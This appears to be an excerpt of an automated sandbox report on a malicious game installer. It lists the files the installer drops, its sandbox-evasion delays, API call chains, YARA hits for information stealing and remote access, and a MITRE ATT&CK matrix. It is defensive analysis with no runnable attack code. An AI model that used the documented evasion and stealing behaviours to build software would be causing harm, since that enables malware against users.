                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9OEDN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-TDV1O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4IVEL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-R8DJL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-3PB3G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PKSJK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JN15J.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9QS5M.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-41E97.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BLG4U.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UHUNS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CJ9O9.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9AV62.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-H36N8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RUH59.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QOSQ7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2BNI8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MB554.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-3L2G6.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RF28Q.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UT63K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-ENF4U.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-4K1KF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8CIMQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PQ8T3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1V1KO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AE6QK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SEJ8F.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5687
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748Thread sleep count: 1511 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748Thread sleep time: -3022000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6200Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748Thread sleep count: 8446 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748Thread sleep time: -16892000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeThread delayed: delay time: 60000Jump to behavior
                  Source: crtgame.exe, 00000007.00000002.3291501599.00000000009A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=[
                  Source: crtgame.exe, 00000007.00000002.3291501599.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.0000000000927000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeAPI call chain: ExitProcess graph end nodegraph_0-6727
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2159
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2399
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A4FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02A4FBBE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A4FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02A4FBBE
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A35F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,GetTickCount,_memset,wsprintfA,_memset,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,7_2_02A35F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A48F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02A48F28
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00476FAC
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02A47A6D cpuid 7_2_02A47A6D
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: GetLocaleInfoA,0_2_004051FC
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: GetLocaleInfoA,0_2_00405248
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: GetLocaleInfoA,1_2_00408570
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: GetLocaleInfoA,1_2_004085BC
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457CE8
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00454AB8 GetUserNameA,1_2_00454AB8
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 5884, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 5884, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Deobfuscate/Decode Files or Information
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Obfuscated Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop ProtocolData from Removable Media2
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Scheduled Task/Job
                  1
                  Access Token Manipulation
                  23
                  Software Packing
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Bootkit
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  NTDS35
                  System Information Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets41
                  Security Software Discovery
                  SSHKeylogging112
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job
                  21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials21
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync11
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Process Injection
                  Proc Filesystem3
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
